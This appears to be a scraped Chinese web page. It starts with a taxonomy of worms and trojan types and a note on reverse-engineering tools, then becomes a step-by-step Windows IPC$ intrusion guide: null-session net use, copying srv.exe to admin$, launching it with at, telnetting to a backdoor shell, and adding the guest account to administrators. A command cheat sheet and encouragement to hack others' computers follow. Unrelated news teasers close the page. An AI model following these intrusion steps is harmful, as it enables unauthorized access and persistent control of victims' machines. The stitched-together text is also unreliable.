一.病毒的分类
二.木马的识别
一.病毒的分类
E-mail 蠕虫:E-mail 蠕虫通过E-mail来进行传播。大部分情况下,该类蠕虫通过将其自身的副本作为邮件的附件或正文中的链接发送,再诱骗接收者运行附件或点击链接下载文件的方式来进行传播。
IM 蠕虫:该类蠕虫通过IM(即时通讯工具)客户端进行传播,这一类的客户端包括:ICQ,MSN,AOL Instant Messenger,雅虎通, *** 或 Skype。
通常,这一类蠕虫都会使用联系人列表来发送包含一个链接的信息,这个链接可能会引导用去到其网站上下载一个包含该蠕虫副本的文件,当用户下载并运行该类文件后,蠕虫将激活。
IRC 蠕虫:这一类的蠕虫通过互联网多线聊天系统(IRC,一种用于多人在互联网上实时聊天的服务系统)来进入用户的计算机。
该类蠕虫将会在互联网聊天室中发布包含其副本的文件或是到此类文件的链接。当用户下载并打开此类文件时,病毒将被激活。
Net-蠕虫:该类蠕虫通过 *** 进行传播。
与其它种类的蠕虫不同, *** 蠕虫实在没有用户的参与下进行传播的。它们会搜索本地 *** 中使用了包含漏洞程序的计算机。为了实现搜索,它们会发送特殊的包含其自身代码或部分此类代码的 *** 数据包。如果 *** 中存在一个具有漏洞的计算机,这类计算机就将收到此类数据包。一旦蠕虫成功地完全感染该计算机,它就将激活。
P2P-蠕虫:文件交换蠕虫将通过点到点的文件交换 *** 进行传播,如:Kazaa,Grokster,EDonkey,FastTrack, *** 或 Gnutella。
其它蠕虫:其它的 *** 蠕虫还包括:
通过 *** 资源传播其副本的蠕虫。如通过可用的 *** 文件夹等进行传播。
使用不包含在以上表格中所列方式进行传播的蠕虫。
压缩包炸弹型木马程序:一类压缩包,当对它们进行解压缩时,它们的大小将会增大到足以让计算机工作中断的地步。当您尝试解开这一类压缩包时,计算机将会开始工作缓慢或是停滞,硬盘中将会被空的数据文件填满。压缩包炸弹对于文件和邮件服务器是最为危险的。
远程管理型木马程序:这一类的程序是木马程序中最为危险的,黑客可以通过它们随时对计算机进行远程管理。这些程序是在用户毫不知晓的情况下进行安装的, 然后其会将计算机的远程管理权限提供给入侵者。
木马:木马包含以下的恶意程序:
经典的木马程序: 该类木马只会执行木马程序的主要功能,如阻止、修改或清除数据,中断计算机或计算机 *** 的运行。它们不会具备该表格中描述的其它种类木马程序的特征。
多目的的木马程序:该类的木马具有其它木马程序的附加功能。
勒索敲诈型木马程序:该类木马程序会劫持用户计算机上的“人质”信息,修改或是隐藏这些信息,或是中断计算机的工作使用户无法使用这些数据。然后,入侵者会向用户要求赎金,以交换用户恢复数据的程序。
点击型木马:该类程序会从用户计算机来访问网页 - 它们会通过向网页浏览器发送命令或是替换存储在系统文件中的网页地址来实现这一操作。
入侵者通过使用这样的程序,就能够阻止针对某个网站的 *** 攻击,或是帮助某些网站增加访问量,提高广告条的播出率。
下载型木马:该类木马程序将会访问入侵者的网页,从其上下载其它的恶意程序,并将其安装在用户计算机上。它们会将可下载的恶意程序文件名存储在自身中或是在登录网站时从网站获取。
释放型木马:该类程序自身会包含其它的木马程序,能够将它们释放至计算机磁盘上并且安装。
入侵者可以使用释放型木马:
在用户不知情的情况下安装恶意程序:释放型木马在安全恶意程序时不会显示任何信息或是显示假冒的报错信息。如,提示压缩包有错误,或是与操作系统版本不兼容等;
保护其它的已知恶意程序不被发现:并不是所有的反病毒程序都能够检测出包含在释放型木马中的恶意程序。
通知型木马:这类木马程序会通知入侵者受感染的计算机已联网,并且把该计算机的相关信息发送给入侵者,包括:IP地址、开放端口号或邮件地址等。它们会通过邮件、FTP、访问入侵者网页或其它的方式与入侵者联系。
*** 型木马:这类木马将会帮助入侵者匿名使用用户的计算机作为访问网页的 *** ,也会使用户计算机发送垃圾邮件。
盗取密码型木马:会盗取密码的木马程序。它们会盗取用户的账户信息,如软件的注册信息等。它们会在注册表和文件系统中搜寻用户的私密信息,然后通过电子邮件、FTP或登录入侵者网站等方式将其传送给入侵者。
间谍程序型木马:该类程序用于对用户的行为进行刺探,它们会收集用户在计算机上的操作信息。如,它们会截取用户通过键盘输入的数据,对屏幕进行截屏,以及收集活动程序列表等。然后,它们会通过电子邮件、FTP或登录入侵者网站等方式将其传送给入侵者。
*** 攻击型木马:该类程序会从用户计算机端向远端的服务器发送大量的数据请求,服务器的资源就会被这样的攻击耗尽,从而停止服务(拒绝服务 (DoS))。该类程序常被用于感染大量的计算机,然后通过它们对服务器发起攻击。
等等,还有很多,以上只是一个简单的分类。要想查看更多相关信息,请访问:查询,该网站是卡巴斯基的网站。
二.木马的识别
1.简单分析(分析其行为)
2.逆向工程工具分析(IDAPro, OllyDBG, Immunity DBG, SoftICE,GDB)
1.利用工具查看该程序做了哪些操作(需要一定的专业知识)
2.病毒分析人员利用工具分析
1)精通X86,C,C++等
2)系统底层知识
3)熟悉各种常用互联网协议
4)熟练运用IDAPro, OllyDBG, Immunity DBG, SoftICE,GDB等逆向工程工具
5)熟悉Perl, Python等脚本语言
卡巴斯基Eric
电脑感染了病毒或者插件携带木马。
遇到这种情况,可以先断开 *** ,黑客就无法攻击电脑了。可以尝试使用系统急救箱查杀系统解决下。
可以安装电脑卫士类型软件,进行查杀工作。
一 相关命令
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.
二 经典入侵模式
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以之一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的 *** 命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;
下面纯手打,上面是度娘给的
taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off .txt|exit 添加文本
echo 内容 .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组
如果想做一个电脑黑客,要从头学起,代码要植入到别人电脑方可攻击或控制别人电脑。建议搜索一下相关网站,什么黑客基地之类的! 一台电脑,可以上网,就OK
本文目录一览: 1、全球最为严重的黑客入侵事件有哪几起? 2、轰动的网络的黑客案有哪些? 3、历史上最著名的几次黑客事件 4、全世界最牛的危害最大的黑客事件是哪几件? 5、全世界最牛的...
白菜是一款具备适用获取安装包,并全自动开展系统软件安裝和引导修复全过程等作用的装机软件。但许多客户搞好U盘启动盘以后对如何安装觉得茫然,对于这个问题,我在这里给大伙儿介绍一下,快看来一下吧。第一步:制...
近日,一则语文老师用QQ养火等级科普生僻字的新闻引起网友热议。据悉,在某校初一某班群内,同学们讨论QQ养火推出的新等级,却不知其中「焱」和「燚」两个字如何发音,用三个火、四个火的说法来代指,引来潜水的...
助从业者从“做不到”到“能做到”,再到“做得好”,新职业教育既需要提升内容质量,也亟须政策和资本的加持—— 【新业态新职业“喊渴”,人才培养如何破局?④】赋能新职业教育:在一起,会更好 ...
中新网12月15日电 据日本放送协会(NHK)报道,NHK近日实施的一份民调显示,约30%的受访者希望取消计划于2021年7月举办的东京奥运会。 当地时间12月1日,日本东京,正在用船运输...
愈来愈多的我国互联网公司刚开始意识到东南亚国家的发展前景。早在2012年以前,东南亚地区一直没能获得国外高度重视,就算互联网公司想要去发展国外销售市场,她们一般也更想要将注意力集中到更为具体的销售市场...